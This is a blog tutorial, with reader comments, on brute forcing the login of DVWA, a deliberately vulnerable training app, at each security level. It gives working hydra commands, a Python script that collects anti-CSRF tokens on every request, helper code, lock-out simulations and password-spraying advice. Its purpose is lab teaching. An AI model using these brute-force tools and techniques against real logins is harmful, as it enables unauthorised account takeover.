Brute Forcing Web Logins with DVWA
In this tutorial I will show you how to beat the Low, Medium and High levels of the brute force challenge within DVWA (Damn Vulnerable Web Application), and look at why the Impossible level holds up.
If you want to follow along and have not yet got DVWA set up, take a look at this tutorial on Setting up a Vulnerable LAMP Server. It will run you through setting up a vulnerable virtual machine and installing DVWA. I have used this as the basis for all my web hacking tutorials on Hemps T
I have been meaning to write this tutorial for a while, after the popularity of a previous tutorial, Brute Forcing Passwords with THC-Hydra. In that one I covered using hydra to brute force a whole bunch of services exposed to the internet, but in the Brute Forcing Webpage Login section I used a Firefox add-on called Tamper Data as the proxy to intercept the web requests and construct the hydra command.
The problem is that Tamper Data no longer works in Firefox, since Mozilla moved to a new framework (WebExtensions) for developing Firefox extensions. This means we have to use something else as a proxy to intercept our web requests.
The best replacement for Tamper Data is Burp Suite, used as our proxy to capture the web requests we need to construct our hydra command.
Burp Suite
Burp Suite is a graphical tool for testing web application security. Written in Java, it has various tools that work seamlessly together to support the entire security testing process, from initial mapping and analysis of an application through to finding and exploiting security vulnerabilities.
There are three different versions of Burp Suite: Enterprise, Professional and the free Community edition. As we are only going to need a fraction of Burp's potential in this tutorial, the free Community edition will be just fine.
You can download Burp Suite for Linux, Mac or Windows, or as a Java JAR file (which will run on anything that runs Java), over at the PortSwigger site.
If you want more information about Burp Suite, check out the talk below, “Web App Pen Testing with Burp Suite” by Jason Nikola, from the recent SANS KringleCon.
Low Security
In the Low security setting the DVWA Brute Force login is just a straightforward HTTP GET request, with nothing in place to block or slow you down when you hammer it with hydra.
This is exactly the same process I covered in Brute Forcing Passwords with THC-Hydra, but this time I will be using Burp Suite instead of Tamper Data to capture our requests.
Let's get logged into DVWA, which unless it has been changed should be the standard username and password of admin/password, and make a start.
Step By Step Brute Force DVWA (Low Security)
1. Set DVWA Security to Low
Start by making sure DVWA's security is set to Low: click the DVWA Security button on the left menu, select Low in the security level drop-down and click Submit.
2. Click the Brute Force button
Click the Brute Force button on the left menu to enter the Brute Force section of DVWA.
3. Open Burp Suite and set up the web proxy
Open Burp Suite. Once it has loaded, click the Proxy tab, then Options, and make sure you have a Proxy Listener set up.
This should be bound to localhost, 127.0.0.1:8080. You can adjust this as you need, but if you are using it with your local web browser just leave the default.
4. Turn Intercept on
Within Burp Suite move across to the Intercept tab and make sure the Intercept button is on.
Burp is now ready to receive requests, and all we have left to do is set up Firefox to send its requests to the web server via Burp.
5. Network Settings in Firefox
Within Firefox type about:preferences in the address bar; this should take you directly to the preferences tab.
Scroll right down to the bottom of the page until you see Network Settings, then click the Settings button.
6. Set the proxy
You should now be in Firefox's Connection Settings. Set the radio button to Manual proxy configuration. This needs to point at localhost, 127.0.0.1, on port 8080, unless you changed the port from the default in step 3.
7. Make a request
Now the proxy is configured we need to make a request to the DVWA Brute Force page.
In my example I used the username UsEr and the password PaSs, then clicked the Login button.
8. Request received by Burp
The request should be received by Burp's proxy.
Make a note of this request, as we will need information from it to construct our Hydra command later: the path of the form, the query string (username=, password= and Login=Login) and the Cookie header (PHPSESSID and security).
9. Failed login message
In Burp Suite, click the Forward button to forward our intercepted request on to the web server.
Because we did not enter the correct username and password, we are presented with the error message Username and/or password incorrect.
Add this to the notes you took of the request in step 8. It lets us tell hydra that anything other than this error message must be a valid login.
10. Construct your hydra command
Use the data intercepted by Burp to construct your hydra command as I have done below.
hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low"
I will break this hydra command down for you...
-V Verbose output, showing the login and password for each attempt in the terminal.
-l admin Use the single login name admin. This could be a capital -L to try a list of usernames.
-P Load passwords from a file; in my case this file is called QuickPasswords.txt.
http-get-form Tells hydra we want to send a GET request. It is followed by one quoted argument made of colon-separated parts, the first of which is the path of the form we want to brute force, taken from the request intercepted in step 8.
username=^USER^&password=^PASS^&Login=Login The query string from the intercepted request, with ^USER^ and ^PASS^ replacing the username and password we actually typed. Hydra substitutes each login/password pair into these place markers.
F=Username and/or password incorrect. The failure message noted in step 9. Hydra treats any response that does not contain this string as a valid login.
H=Cookie: PHPSESSID=...; security=low The Cookie header, copied from the intercepted request. It is only needed because of DVWA's own login page: without a logged-in PHPSESSID the brute-force page is not reachable, and the security cookie selects the level. In the real world you will not normally be logged in to get to a login page. The session id must still be valid when hydra runs; if it has expired, DVWA sends every request to its login page, the failure string is never seen, and hydra reports every guess as a valid password (this is where the 16 "valid" passwords, one per parallel task, that people often see come from).
11. Run the hydra command
Run your hydra command. Depending on the size of the password list this should take only a few minutes before it finds the correct password.
If you have issues with any of these steps above, please Leave me a comment at the bottom of this tutorial and I will give you any help you need to get you up and running.
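As an added example (not part of the original tutorial), the Python below does step 10 mechanically: it parses a raw request of the kind Burp shows in step 8 and builds hydra's http-get-form argument from it, swapping the typed username and password for ^USER^ and ^PASS^ and carrying the captured Cookie header across with H=. It also shows what hydra's F= rule makes of a response body, which is where the "16 valid passwords" false positives come from. The captured request is a constructed sample; the host, path and session id in it are placeholders to be replaced with what Burp actually shows.

```python
# Added example (not code from the original tutorial): build the http-get-form
# argument for hydra from a raw request captured in Burp's Proxy > Intercept
# tab (step 8 above), and show what hydra's F= rule makes of a response.
# The captured request below is a constructed sample; the host, session id and
# path are placeholders and should be replaced with what Burp actually shows.
import shlex
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Constructed sample of the request Burp intercepts in step 8.
BURP_REQUEST = """GET /dvwa/vulnerabilities/brute/?username=UsEr&password=PaSs&Login=Login HTTP/1.1
Host: 192.168.0.20
User-Agent: Mozilla/5.0
Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low
Connection: close

"""

# The failure message noted in step 9.
FAIL_STRING = "Username and/or password incorrect."


def parse_request(raw):
    """Split a raw HTTP request into (method, path, query pairs, headers)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, *header_lines = head.split("\n")
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)
    headers = {}
    for line in header_lines:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, url.path, params, headers


def build_hydra_form(raw, user_field="username", pass_field="password",
                     fail_string=FAIL_STRING):
    """Return hydra's "path:query:F=...:H=Cookie: ..." argument.

    The values typed for the user and password fields are swapped for ^USER^
    and ^PASS^, every other parameter (Login=Login) is kept, and the Cookie
    header captured from the logged-in browser session is passed along with H=.
    """
    method, path, params, headers = parse_request(raw)
    if method != "GET":
        raise ValueError("not a GET request; use http-post-form for POST logins")
    rewritten = []
    for name, value in params:
        if name == user_field:
            value = "^USER^"
        elif name == pass_field:
            value = "^PASS^"
        else:
            value = quote_plus(value)
        rewritten.append(f"{name}={value}")
    query = "&".join(rewritten)
    if "^USER^" not in query or "^PASS^" not in query:
        # hydra itself refuses to run without both markers
        raise ValueError("could not find the username/password parameters")
    form = f"{path}:{query}:F={fail_string}"
    if "cookie" in headers:
        form += f":H=Cookie: {headers['cookie']}"
    return form


def build_hydra_command(raw, login, wordlist, **kwargs):
    """Return the full hydra argv (a list, so no shell quoting can go wrong)."""
    host = parse_request(raw)[3]["host"]
    return ["hydra", host, "-V", "-l", login, "-P", wordlist,
            "http-get-form", build_hydra_form(raw, **kwargs)]


def hydra_verdict(body, fail_string=FAIL_STRING):
    """What hydra concludes from a response body under the F= rule.

    Only the failure string means "wrong password". A session that has
    expired (DVWA sends you to its login page) or, on the High level, a
    missing CSRF token ("CSRF token is incorrect") never contains it, so
    every such guess is reported as a valid password: the 16 false positives.
    """
    return "wrong password" if fail_string in body else "reported as valid"


if __name__ == "__main__":
    argv = build_hydra_command(BURP_REQUEST, "admin", "QuickPasswords.txt")
    print(shlex.join(argv))   # copy-and-paste form for bash
```

Passing the argv list straight to subprocess.run sidesteps the shell quoting problems (the & and ; inside the argument) that trip people up when the command is typed by hand.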
Medium Security
The Medium security setting extends the Low level by adding a two-second delay to every failed login.
Re-run the hydra command you used for Low security, changing the security setting at the end of the command to medium.
hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=medium"
The hydra command still works; it just takes a little longer to run. This is because the PHP has been adjusted to sleep for two seconds on every failed login.
Luckily, in DVWA we can easily check the PHP source code for every security level: just click the View Source button at the bottom of the DVWA window. This displays the PHP source, which shows the sleep( 2 ) call in the login-failed branch, as pictured below.

This shows that a fixed delay on failed logins is not, on its own, adequate protection against a brute force attack. It only slows the attack down: hydra keeps its 16 parallel tasks busy, so a two-second delay per failed attempt still allows roughly eight guesses a second, and the attacker can raise the number of tasks with -t.
High Security
Switching to the High security level, if you just re-run the hydra command as we did with Medium security, changing the security= at the end of the command to high, as below...
hydra 192.168.0.20 -V -l admin -P '/home/vreality/Downloads/QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=high"
Hydra's output will report 16 valid passwords, one for every parallel task, all of them wrong.

Before going any further, let's use Firefox's Inspector, by right-clicking the web page within Firefox and choosing Inspect Element, and take a look at the HTML of the login form.
Drill down in the Inspector until you find the HTML for the login form. Notice there is now a hidden field named user_token being submitted with our GET request.

If you change type="hidden" to type="text" you should see the hidden box render in your web browser.

If you remove all the characters from this un-hidden box and try to log in, the request is rejected with the message CSRF token is incorrect.

Making Burp intercept a login attempt shows the user_token, with a string of alphanumeric characters, added to the end of the GET request.

Forward the intercepted request and have another go at logging in; notice that user_token= has changed to another random alphanumeric string.

This is the anti-CSRF token. It is a random value, generated by the server and impossible to guess, that is stored in the session and embedded in the form, then sent back with our GET request so the server can check that the request came from a page it served. DVWA issues a fresh token with every response and only accepts the most recent one, so every attempt has to fetch the page first to get the current token.
On the brute-forcing page we are looking at, if the CSRF token does not match, the request fails with the message "CSRF token is incorrect", which we saw a moment ago when we sent a request after emptying the hidden user_token= field. The token is not a brute-force defence as such (it exists to stop cross-site request forgery); it just defeats tools that cannot track it.

We can no longer use hydra alone to brute force DVWA on the High level.
There are a few options to get around this. Firstly, we could use Burp on its own: Burp Intruder can capture the CSRF token from each response and run the brute force against the page, but in the Community edition Intruder is rate-limited to a single thread, greatly reducing Burp's attack speed.
You can also combine Burp with Hydra by sending Hydra's traffic through Burp as an upstream proxy (the HYDRA_PROXY_HTTP environment variable). A Burp session handling rule with a macro then fetches the page, extracts the current user_token and inserts it into each of Hydra's requests, so Hydra does not need to be aware of the CSRF token; this also sidesteps Intruder's limitations in the Community edition.
Lastly, we can have a go at creating our own brute forcing tool, which is the option I thought was most interesting and which I will be covering below using Python.
If you would like to see a tutorial on using Burp alone, or Burp and Hydra together, to brute force DVWA on High security, please let me know in the comments below and I will make a separate tutorial for these.
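To make the token handshake concrete, here is an added example (not code from the original tutorial, and not DVWA's PHP) that models the High level's per-request anti-CSRF check on the server side and runs two clients against it: a hydra-style client that replays one captured request per guess, and a token-aware client that re-reads the form before every guess. The credentials, the HTML fragments and the token format are constructed for the demo.

```python
# Added example (not code from the original tutorial, and not DVWA's PHP): a
# toy model of the High level's per-request anti-CSRF token, with a hydra-style
# client that never reads the token and a token-aware client that refetches the
# form before every guess. Credentials and markup are constructed for the demo.
import secrets

FAIL = "Username and/or password incorrect."
CSRF_FAIL = "CSRF token is incorrect"
WELCOME = "Welcome to the password protected area"


class HighBrutePage:
    """Stand-in for /vulnerabilities/brute/ at security=high (simplified)."""

    def __init__(self, username="admin", password="password"):
        self._creds = (username, password)
        self._session_token = secrets.token_hex(16)

    def get_form(self):
        """Serve the form; returns (html, token), html carrying the hidden field."""
        html = f'<input type="hidden" name="user_token" value="{self._session_token}" />'
        return html, self._session_token

    def submit(self, username, password, user_token=None):
        """Handle ?username=..&password=..&Login=Login&user_token=..

        The submitted token must equal the one issued with the last response.
        A fresh token is generated with every reply, so a token is good for
        exactly one submission and a captured one cannot be replayed.
        """
        expected, self._session_token = self._session_token, secrets.token_hex(16)
        form_html = self.get_form()[0]
        if user_token != expected:
            return f"<p>{CSRF_FAIL}</p>{form_html}"
        if (username, password) == self._creds:
            return f"<p>{WELCOME} {username}</p>"
        return f"<pre>{FAIL}</pre>{form_html}"


def hydra_style(page, username, wordlist, token=None):
    """Replay one captured request per guess, as hydra does with http-get-form.

    Returns [(password, flagged_as_valid)] using hydra's F= rule: any reply
    without the failure string counts as a hit.
    """
    hits = []
    for pw in wordlist:
        body = page.submit(username, pw, token)
        hits.append((pw, FAIL not in body))
    return hits


def token_aware(page, username, wordlist):
    """Read the current user_token from the form before each guess, which is
    the approach the Python script later on this page takes."""
    for pw in wordlist:
        _, token = page.get_form()
        if WELCOME in page.submit(username, pw, token):
            return pw
    return None


if __name__ == "__main__":
    words = ["letmein", "qwerty", "password", "123456"]
    print("hydra-style, no token :", hydra_style(HighBrutePage(), "admin", words))
    print("token-aware           :", token_aware(HighBrutePage(), "admin", words))
```

Run stand-alone, the first line shows every guess flagged as valid (no reply ever contains the failure string), which is the "16 valid passwords" symptom, while the token-aware client lands on the real password. Because each reply carries the token for the next request, the token-aware client is inherently sequential per session; parallelising it means one logged-in session per worker.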
Using Python to Brute Force DVWA (High Security)
While researching this tutorial I came across a post on Medium by Danny Beton, https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39, where he covers, step by step, creating a Python script that captures the CSRF token and brute forces the login to DVWA on High security.
I had to make a few changes to Danny's original script to get it working, only because the password file was leaving a trailing newline on the end of every password tried, and I also wanted to see each password tried printed as the script runs.

Below is my edited version of Danny's Python script, which I saved as DVWA-BruteForce.py. It is written for Python 3 and uses the beautifulsoup4 package.
from sys import argv
import requests
from bs4 import BeautifulSoup as Soup

# give our arguments more semantic friendly names
script, filename, success_message = argv

# set up our target, cookie and session
url = 'http://192.168.0.20/dvwa/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID': 'kjrkqb382512vao219va7sk0s4'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)


def checkSuccess(html):
    '''
    checkSuccess
    @param: html (String)
    Searches the response HTML for our specified success message
    '''
    # get our soup ready for searching
    soup = Soup(html, 'html.parser')
    # check for our success message in the page text (get_text() joins the
    # text nodes, so the message still matches if the username is wrapped
    # in its own tag)
    return success_message in soup.get_text()


def getToken(html):
    '''
    getToken
    @param: html (String)
    Pulls the current anti-CSRF token out of the hidden user_token field
    '''
    soup = Soup(html, 'html.parser')
    return soup.find_all(attrs={"name": "user_token"})[0].get('value')


# Get the initial CSRF token from the target site
csrf_token = getToken(target_page.text)

# Display before attack
print('DVWA URL: ' + url)
print('CSRF Token=' + csrf_token)

# Loop through our provided password file
success = False
with open(filename) as f:
    print('Running brute force attack...')
    for password in f:
        # strip the trailing newline from the password list and show each try
        password = password.strip()
        print('password tried: ' + password)
        # setup the payload
        payload = {'username': 'admin', 'password': password,
                   'Login': 'Login', 'user_token': csrf_token}
        r = s.get(url, cookies=cookie, params=payload)
        success = checkSuccess(r.text)
        if not success:
            # if it failed the CSRF token will have changed. Get the new one
            csrf_token = getToken(r.text)
        else:
            # Success! Show the result
            print('Password is: ' + password)
            break

# We failed, bummer.
if not success:
    print('Brute force failed. No matches found.')
You will need to install the Python modules beautifulsoup4 and requests for the script above to work, as these are not part of the default Python installation.
BeautifulSoup is a web scraping library, used here to pull the CSRF token out of the page HTML. Requests is what makes the requests to the web server. argv, from the sys module, supplies arguments to the script from the command line and is part of the standard library.
These modules can be installed using pip with the command below.
python3 -m pip install requests beautifulsoup4
Also, to get this to work you need to edit the url = line in the script to the IP address of your DVWA web server, and you need to capture a PHPSESSID using Burp, as we did in step 8 of the Low security section, and put it in the cookie dictionary. The session must still be logged in when the script runs, and the security cookie must be high. Note the script is deliberately sequential: each response carries the token needed for the next request, so the requests cannot simply be fired in parallel on one session.
Run the Python script using the command below, adding the password list and the message which is received on a successful login.
python3 DVWA-BruteForce.py QuickPasswords.txt "Welcome to the password protected area admin"
If the Script works you should see an output like this..

Impossible Security
Brute force and user enumeration should not be possible at the Impossible security level in DVWA. There is now a lock-out feature: after a small number of bad logins (three in the DVWA source; the values are set at the top of the level's PHP as $total_failed_login and $lockout_time, so check them in View Source for your build) the account is locked for 15 minutes, and every failed login also sleeps for a random 2 to 4 seconds.
If the locked-out user tries to log in, even with a valid password, the page still says the username or password is incorrect. The same generic message is returned for a username that does not exist, so the response gives no way to tell whether an account is valid, let alone locked.

If time is not an issue we do have a couple of options that would eventually brute force the login. We could edit the Python script we used on High security to wait 15 minutes after every few password tries. This is slower than it sounds. The View Source shows that the failed_login counter is only reset by a successful login and that last_login is stamped on every attempt, so once the threshold has been reached each further wrong guess re-locks the account for another 15 minutes, leaving one genuine guess per window (four an hour). Worse, a password submitted while the account is locked is reported as incorrect even when it is right, so the script has to track which guesses were actually evaluated and retry the others.
The other option is password spraying: using one password against many users rather than hammering a single account. Because the lock-out is per account, spreading the guesses keeps every account under the threshold, and the number of guesses you get per 15-minute window grows with the number of accounts you spray.
If you would like to see some more information about password spraying, leave me a comment below and I will make sure I add it to the list of future posts.
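The two options above are easier to compare with numbers, so here is an added example (not code from the original tutorial, and not DVWA's PHP) that models the Impossible level's lock-out on a simulated clock and runs both strategies against it. The rules it encodes are a simplified reading of the level's view-source (a per-user failure counter, a 15-minute window, the counter reset only by a successful login, last_login stamped on every attempt); the accounts and passwords are constructed, and the threshold and window are parameters you should check against your own build.

```python
# Added example (not code from the original tutorial, and not DVWA's PHP): a
# small model of the Impossible level's account lock-out, used to compare the
# "wait after every few guesses" idea with password spraying. The rules are a
# simplified reading of the level's view-source (threshold, window, counter
# reset only by a successful login, last_login stamped on every attempt);
# check the values against your own build. Users and passwords are constructed.
GENERIC = "Username and/or password incorrect."
WELCOME = "Welcome to the password protected area"


class LockoutLogin:
    """Server-side model of the lock-out. Time is a simulated clock in seconds."""
    THRESHOLD = 3        # $total_failed_login
    WINDOW = 15 * 60     # $lockout_time, in seconds

    def __init__(self, creds):
        self.creds = dict(creds)
        self.failed = dict.fromkeys(creds, 0)
        self.last = dict.fromkeys(creds, None)
        self.evaluated = 0   # attempts whose password was actually checked

    def login(self, user, password, now):
        if user not in self.creds:
            return GENERIC                   # unknown users get the same message
        locked = (self.failed[user] >= self.THRESHOLD
                  and now < self.last[user] + self.WINDOW)
        self.last[user] = now                # every attempt re-stamps last_login
        if locked:
            self.failed[user] += 1           # ...so a locked attempt extends the lock
            return GENERIC
        self.evaluated += 1
        if self.creds[user] == password:
            self.failed[user] = 0            # only a successful login resets the count
            return f"{WELCOME} {user}"
        self.failed[user] += 1
        return GENERIC


SLEEP = 3   # stands in for the level's random 2-4 second sleep on failure


def hammer_one_user(site, user, wordlist, batch=4):
    """Try every password against one account, waiting out the window after each batch."""
    clock, found = 0, None
    for i, pw in enumerate(wordlist, 1):
        if WELCOME in site.login(user, pw, clock):
            found = pw
            break
        clock += SLEEP
        if i % batch == 0:
            clock += LockoutLogin.WINDOW
    return found, clock


def spray(site, users, wordlist):
    """One password against every account per window, so no account is ever locked."""
    clock, found = 0, {}
    for pw in wordlist:
        for user in users:
            if WELCOME in site.login(user, pw, clock):
                found[user] = pw
            clock += SLEEP
        clock += LockoutLogin.WINDOW
    return found, clock


# Constructed demo accounts and wordlist; alice's password sits in the slot
# that the batch-of-four plan submits while her account is locked.
CREDS = {"alice": "letmein", "bob": "Winter2019", "carol": "Summer2019"}
WORDLIST = ["123456", "password", "Summer2019", "letmein", "Winter2019", "qwerty"]

if __name__ == "__main__":
    site = LockoutLogin(CREDS)
    print("hammer alice:", hammer_one_user(site, "alice", WORDLIST),
          "evaluated", site.evaluated, "of", len(WORDLIST))
    site = LockoutLogin(CREDS)
    print("spray:", spray(site, list(CREDS), WORDLIST),
          "evaluated", site.evaluated, "of", len(CREDS) * len(WORDLIST))
```

Run stand-alone, the single-account run never finds alice's password: it was submitted as the fourth guess, while the account was already locked, and came back with the same generic message as a wrong guess, and only four of the six passwords were really checked. The spray run, which sends each password to every account and then waits out the window, has every guess evaluated and recovers all three passwords, because no account ever reaches the threshold inside a window.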
HomeWork
Using everything you have just learnt from this tutorial and the Brute Forcing Passwords with THC-Hydra tutorial, set the DVWA security to Low and use Hydra to enumerate and brute force the other four user logins, then post your findings in the comments section below.
References:
- https://blog.g0tmi1k.com/dvwa/bruteforce-medium/
- https://blog.g0tmi1k.com/dvwa/bruteforce-high/
- https://hd7exploit.wordpress.com/2017/05/28/dvwa-brute-force-high-level/
- https://medium.com/@dannybeton/dvwa-brute-force-tutorial-medium-5cd2fcfd7a8c
- https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39
- https://www.youtube.com/watch?v=3ljfZ68owVU
Thanks man. First clear, straight-to-the-point, no-frills guide. I'm just starting to look more seriously into this stuff and trying to understand it from the basics on. Cheers!
Hi DonPorno, thanks for the comment.
That's exactly why I made this guide. If you have any questions, drop me a comment on here or over on social media.
Hemp
Nice.
I just brute forced DVWA at the High security level using the same command. But I used the login screen, not the Brute Force login screen, using the POST method and without using cookies. Check my tutorial here, which was adapted from yours and another one.
https://phoenyxacademy.com/how-to-brute-force-websites-logins-with-hydra-and-burpsuite/
Hi Faisel
Nice write-up. The reason this works even on the High setting is because the CSRF token is broken on the main DVWA login, so Medium and High security are basically the same.
If you are ever interested in guest writing a tutorial, hit me up at [email protected].
Keep up the good work mate
Hemp
Thanks for your tutorial, it is fantastic!
Can you show me a tutorial for either using Burp, or using Burp and Hydra, to brute force DVWA on High security?
How do you resolve the error in Hydra's output when it finds 16 valid passwords?
Thanks
Hi AVL
Thanks for your comment.
A tutorial on using just Burp, or Hydra through Burp as a proxy, to brute force DVWA on High security is a good idea. I'll add it to my future tutorials list.
When you get the 16 valid passwords it usually means you have either got your hydra syntax wrong or, in the case of DVWA on High security, there is a CSRF token in place which hydra can't deal with alone.
Hope this helps.
Hemp
[ERROR]- optional parameter must start with a ‘/’ slash!
At Low security level.
Hi Neel
Can you send me the Hydra command you are trying to run in the comments?
Hemp
Hi
Sir, my Burp Suite is not intercepting the traffic. I have configured it to no proxy and 127.0.0.1 8080 but it is not capturing anything.
Without cookies and session id, when I run the script it gives me the wrong password and username pair?
My script is
hydra -vV -L usernames.txt -P passwords.txt 127.0.0.1 http-get-form ‘/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.’ -f
and the output is
root@kali:~# hydra -vV -L usernames.txt -P passwords.txt 127.0.0.1 http-get-form ‘/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.’ -f
Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2020-12-29 12:04:08
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
[DATA] attacking http-get-form://127.0.0.1:80//DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:F=Username and/or password incorrect.
[VERBOSE] Resolving addresses … [VERBOSE] resolving done
[ATTEMPT] target 127.0.0.1 – login “admin” – pass “asdfgh” – 1 of 12 [child 0] (0/0)
[ATTEMPT] target 127.0.0.1 – login “admin” – pass “password” – 2 of 12 [child 1] (0/0)
[ATTEMPT] target 127.0.0.1 – login “admin” – pass “qwerty” – 3 of 12 [child 2] (0/0)
[ATTEMPT] target 127.0.0.1 – login “bob” – pass “asdfgh” – 4 of 12 [child 3] (0/0)
[ATTEMPT] target 127.0.0.1 – login “bob” – pass “password” – 5 of 12 [child 4] (0/0)
[ATTEMPT] target 127.0.0.1 – login “bob” – pass “qwerty” – 6 of 12 [child 5] (0/0)
[ATTEMPT] target 127.0.0.1 – login “khan” – pass “asdfgh” – 7 of 12 [child 6] (0/0)
[ATTEMPT] target 127.0.0.1 – login “khan” – pass “password” – 8 of 12 [child 7] (0/0)
[ATTEMPT] target 127.0.0.1 – login “khan” – pass “qwerty” – 9 of 12 [child 8] (0/0)
[ATTEMPT] target 127.0.0.1 – login “” – pass “asdfgh” – 10 of 12 [child 9] (0/0)
[ATTEMPT] target 127.0.0.1 – login “” – pass “password” – 11 of 12 [child 10] (0/0)
[ATTEMPT] target 127.0.0.1 – login “” – pass “qwerty” – 12 of 12 [child 11] (0/0)
[80][http-get-form] host: 127.0.0.1 login: bob password: password
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-12-29 12:04:09
Hi Abdur,
Are you saying that you can't capture any traffic with Burp, or just when you use hydra?
If you can't capture any traffic with Burp, make sure you have the proxy details set up in your web browser.
If it's the latter, you can use the HYDRA_PROXY_HTTP or HYDRA_PROXY command to proxy your hydra traffic through Burp.
Let me know how you get on.
Hemp
Hello sir, I am getting an error. As I am new to this web app pentesting I am not able to resolve it, please help.
zsh: parse error near `&'
This is the error which I am getting.
Hi Ninjafurry, thanks for your comments...
What's the command you are actually trying to run? I think you may have a typo in there causing this parse error.
Check the command and, if you are still getting this error, copy and paste the command here and I'll take a look at it for you.
Hemp
hydra 192.168.43.124 -V -l admin -P ‘/usr/share/wordlists/rockyou.txt’ http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=omi079qgij3pt6rhuojhs4a371; security=low”
This is the command I am trying.
Your command is correct... Just check that the PHPSESSID= and IP address are still correct.
Hmmm, this is an interesting one. Do you get the same issue when you use a different program like curl?
Try something like this: curl https://192.168.43.124/dvwa/vulnerabilities/brute/ Do you get the same error?
What OS are you running? Is it fully updated?
Let me know how you get on...
Hemp
Yes, PHPSESSID and IP are correct.
While using curl I didn't encounter any error.
cat /etc/os-release
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2021.1"
VERSION_ID="2021.1"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
Damn, it looks all up to date too... Maybe there is a problem with the repo version of hydra. Have you tried installing the latest version, 9.1, from their GitHub: https://github.com/vanhauser-thc/thc-hydra/releases
Regards,
Also, how did you set up DVWA? Did you follow my guide on Setting up a Vulnerable LAMP Server?
Hemp
My hydra is already the latest version, 9.1, and I configured DVWA on the local network. I tried to find a solution like ! / but can't solve the error which is coming.
Nope, I didn't follow your instructions to configure DVWA. I think the problem is the terminal; should I change zsh to bash and try? Or should I try your DVWA setup instructions?
You know, I should have realised you were not using bash... Yeah, try it in bash...
I found a way, but I'm not sure if it is right or wrong. If you can confirm it, that will be very helpful.
sudo hydra 192.168.43.124 -V -l admin -P “/usr/share/wordlists/rockyou.txt” http-get-form ‘dvwa/vulnerbality/brute/:username=^USER^;password=^PASS^;Login=Login:F=Username and/or password incorrect,:H=Cookie: PHPSESSID=token; security=low’
As I am new to this.
Congrats, that's the start of becoming a hacker: tweaking the command to work for your situation.
Did you get the desired result?
I've compared the two commands you sent me and the only difference I can see is you added sudo to the command and switched the backticks around.
sudo hydra 192.168.43.124 -V -l admin -P “/usr/share/wordlists/rockyou.txt” http-get-form ‘dvwa/vulnerbality/brute/:username=^USER^;password=^PASS^;Login=Login:F=Username and/or password incorrect,:H=Cookie: PHPSESSID=token; security=low’
Interested to know, though, if the failed response in Burp on Low security is now "Username and/or password incorrect," (with a comma)... or if it was just a typo.
Just remember, Ninjafurry, everyone starts somewhere and it's all about the journey you take.
Drop me a message here any time mate and I will try and help if I can.
Hemp
I'm having a confusing experience: my password guesses are just hanging. If I add errors to the hydra command, I get 16 false positives. However, if the command is correct, it just returns a message that it is attempting the same 16 requests, but extends the time period for the response (see below):
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -V 192.168.2.116 http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb2”
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-15 17:36:44
[WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get-form://192.168.2.116:80/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=4c35d19c6addd9c7f6cdccb01ac0abb2
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “123456” – 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “12345” – 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “123456789” – 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “password” – 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 192.168.2.116 – login “admin” – pass “iloveyou” – 5 of 14344399 [child 4] (0/0)
